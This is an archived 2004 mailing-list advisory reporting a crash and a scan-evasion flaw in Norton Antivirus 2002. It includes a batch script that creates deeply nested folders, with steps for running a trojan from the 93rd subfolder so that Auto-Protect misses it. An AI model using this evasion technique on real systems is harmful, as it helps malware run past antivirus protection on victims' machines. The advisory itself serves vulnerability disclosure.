lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040306041320.76701.qmail@web20209.mail.yahoo.com>
From: visitbipin at yahoo.com (bipin gautam)
Subject: Norton Antivirus 2002  fails to scan files with .................

Subject: Norton Antivirus 2002  fails to scan files
with special character(s) properly.
Published: Friday, 05 March, 2004
Updated: 06-Mar-04
Discovered By: Bipin Gautam ( hUNT3R ) 
Product Version: Norton Antivirus 2002 [ ver: 8.00.58
] (~Only tested On...~)
Risk Impact: Low-Medium

*   *   *
Details: 

During a 'manual scan' of a folder, if Norton
Antivirus (NAV) encounters a file /folder name with
'some'  ASCII characters ( 1-31) NAV can't further
proceed the manual scan and its front-end 'NAVW32.exe'
crashes! This Bug has no impact in the NAV
Auto-Protect Engine.

Exploit 1). :
http://www.geocities.com/visitbipin/test_nav.zip
Create a folder (say: '!' ) and put some sub-folders
and files in it. The file/sub-folder name must contain
 ASCII character(s)  ( 1-31) . Have a manual scan of
the folder named '!' NAV can't  proceed the scan and
crashes!

Exploit 2). : Run this batch script, first and make
sure you have 95 sub-folders inside the folder named
'----------------------------------------------------------------'
in c:\ (root)



=-------CUT----------=
@echo off
echo ( you can use,
http://www.eicar.org/anti_virus_test_file.htm)
echo for a harmless test... 
pause
cd\
c:
cd\
:hUNT3r 
md 1 
cd 1 
if not errorlevel  1 goto :hUNT3r
:rename
cd\
c:
cd\
ren 1
----------------------------------------------------------------
explorer c:
exit

=-------CUT----------=

Now... drag/drop a trojan named 1.exe (that NAV
recognises as a hostile program) to the 93'rd
sub-folder and execute the program from there........
NAV-AUTO PROTECT is unable to scan/block the program &
the trojan gets executed. 

[...THIS TECHNIQUE SHOULD WORK FOR SOME OTHER
ANTIVIRUS PRODUCT TOO...]

Make sure the trojan/warm.exe just have a 1 character
file-name! when it is executer from 93'rd sub
directory! (...Last possible DIRECTORY where the file
file can be copied!)
 

Disclaimer: The information in the advisory is
believed to be accurate at the time of printing based
on currently available information. Use of the
information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this
information. Neither the author nor the publisher
accepts any liability for any direct, indirect or
consequential loss or damage arising from use of, or
reliance on this information. 




__________________________________
Do you Yahoo!?
Yahoo! Search - Find what you’re looking for faster
http://search.yahoo.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ